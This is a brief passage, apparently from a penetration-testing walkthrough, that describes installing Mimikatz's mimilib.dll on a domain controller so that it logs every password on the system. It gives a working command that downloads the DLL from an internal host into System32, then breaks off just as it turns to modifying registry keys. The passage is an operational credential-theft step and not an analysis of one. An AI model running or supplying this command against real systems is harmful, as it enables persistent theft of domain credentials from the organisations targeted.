The theory behind this attack is that we inject a Malicious DLL that logs every password on the system

first we need to drop Mimilib.dll in the DC System32 directory

wget -Uri <http://172.16.100.22/mimilib.dll> -OutFile mimilib.dll

Now let’s modify the Registry Keys